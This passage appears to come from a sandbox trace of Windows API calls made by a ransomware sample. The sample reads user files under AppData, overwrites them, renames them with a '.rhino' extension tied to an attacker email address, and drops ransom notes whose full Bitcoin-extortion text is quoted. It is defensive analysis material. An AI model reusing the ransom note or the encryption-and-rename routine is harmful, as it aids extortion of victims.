lpMem=0x709a08 | out: hHeap=0x6d0000) returned 1 [0088.202] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x23b0048 [0088.202] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.202] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0088.202] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x23b00e0 [0088.202] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.202] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0088.205] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0088.205] WriteFile (in: hFile=0xec, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0088.207] CloseHandle (hObject=0xec) returned 1 [0088.208] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0088.208] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0088.208] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xa00 [0088.208] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xb20, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.208] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.208] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0088.211] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.212] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xa00, lpOverlapped=0x0) returned 1 [0088.212] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0088.212] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.212] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0088.212] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0088.212] GetLastError () returned 0x0 [0088.212] SetLastError (dwErrCode=0x0) [0088.212] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.212] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa00) returned 0x23b00e0 [0088.213] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.213] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0ae8 [0088.213] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0bf0 [0088.213] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ae8 | out: hHeap=0x6d0000) returned 1 [0088.213] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.213] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0088.213] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0088.213] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.213] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0088.213] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0088.213] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0088.213] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.213] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0088.213] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0088.213] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0088.213] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.213] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0088.213] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0088.214] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0088.214] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0088.214] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0088.214] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0088.214] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0088.214] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0088.214] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0088.214] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.214] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0088.214] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.214] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0088.214] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0088.214] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0ae8 [0088.214] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.214] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0d78 [0088.214] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ae8 | out: hHeap=0x6d0000) returned 1 [0088.214] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x75ef78 [0088.214] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0d78 | out: hHeap=0x6d0000) returned 1 [0088.215] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x75f160 [0088.215] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0088.215] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75f430 [0088.215] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f160 | out: hHeap=0x6d0000) returned 1 [0088.215] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x75f868 [0088.215] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f430 | out: hHeap=0x6d0000) returned 1 [0088.215] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x75feb0 [0088.215] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f868 | out: hHeap=0x6d0000) returned 1 [0088.215] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75ef78 [0088.215] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75feb0 | out: hHeap=0x6d0000) returned 1 [0088.215] WriteFile (in: hFile=0xec, lpBuffer=0x75ef78*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75ef78*, lpNumberOfBytesWritten=0x2cfa04*=0xb20, lpOverlapped=0x0) returned 1 [0088.215] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0088.215] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xb20, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.216] CloseHandle (hObject=0xec) returned 1 [0088.220] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0ae8 [0088.221] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0d78 [0088.292] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ae8 | out: hHeap=0x6d0000) returned 1 [0088.292] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0088.293] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0d78 | out: hHeap=0x6d0000) returned 1 [0088.293] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0bf0 | out: hHeap=0x6d0000) returned 1 [0088.293] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0088.293] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x72a920 [0088.293] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.293] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x23b0048 [0088.293] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23b00d0 [0088.293] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.293] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0088.293] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0088.293] WriteFile (in: hFile=0x104, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0088.296] CloseHandle (hObject=0x104) returned 1 [0088.296] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00d0 | out: hHeap=0x6d0000) returned 1 [0088.296] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0088.296] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x9a2 [0088.297] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xac2, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.297] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.297] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0088.299] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.300] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x9a2, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x9a2, lpOverlapped=0x0) returned 1 [0088.300] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0088.301] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.301] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0088.301] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0088.301] GetLastError () returned 0x0 [0088.301] SetLastError (dwErrCode=0x0) [0088.301] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.301] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a2) returned 0x23b0048 [0088.301] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.301] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b09f8 [0088.301] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0b00 [0088.301] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b09f8 | out: hHeap=0x6d0000) returned 1 [0088.301] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.301] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0088.301] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0088.301] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.301] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0088.301] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0088.301] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0088.302] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.302] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0088.302] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0088.302] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0088.302] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.302] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0088.302] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0088.302] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0088.302] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0088.302] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0088.302] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0088.302] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0088.302] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0088.302] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0088.302] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.302] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0088.302] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.302] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x23b09f8 [0088.302] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0088.303] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0c88 [0088.303] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b09f8 | out: hHeap=0x6d0000) returned 1 [0088.303] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0d68 [0088.303] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0c88 | out: hHeap=0x6d0000) returned 1 [0088.303] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x75ef78 [0088.303] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0d68 | out: hHeap=0x6d0000) returned 1 [0088.303] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b0c88 [0088.303] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0088.303] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75ef78 [0088.303] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0c88 | out: hHeap=0x6d0000) returned 1 [0088.303] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x75f3b0 [0088.303] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0088.303] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x75f9f8 [0088.303] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f3b0 | out: hHeap=0x6d0000) returned 1 [0088.303] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x760360 [0088.303] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f9f8 | out: hHeap=0x6d0000) returned 1 [0088.303] WriteFile (in: hFile=0x104, lpBuffer=0x760360*, nNumberOfBytesToWrite=0xac2, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x760360*, lpNumberOfBytesWritten=0x2cfa04*=0xac2, lpOverlapped=0x0) returned 1 [0088.304] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760360 | out: hHeap=0x6d0000) returned 1 [0088.304] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xac2, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.304] CloseHandle (hObject=0x104) returned 1 [0088.308] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b09f8 [0088.309] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0c88 [0088.309] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b09f8 | out: hHeap=0x6d0000) returned 1 [0088.309] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0088.312] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0c88 | out: hHeap=0x6d0000) returned 1 [0088.312] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0b00 | out: hHeap=0x6d0000) returned 1 [0088.312] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.312] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x23b0048 [0088.312] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.312] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x72a920 [0088.313] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23b00d0 [0088.313] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.313] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.313] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00d0 | out: hHeap=0x6d0000) returned 1 [0088.313] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0088.314] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xa8 [0088.314] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1c8, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.314] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.314] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0088.316] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.316] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xa8, lpOverlapped=0x0) returned 1 [0088.316] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0088.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0088.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0088.317] GetLastError () returned 0x0 [0088.317] SetLastError (dwErrCode=0x0) [0088.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa8) returned 0x23b00d0 [0088.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0180 [0088.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0288 [0088.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0180 | out: hHeap=0x6d0000) returned 1 [0088.317] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0088.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, 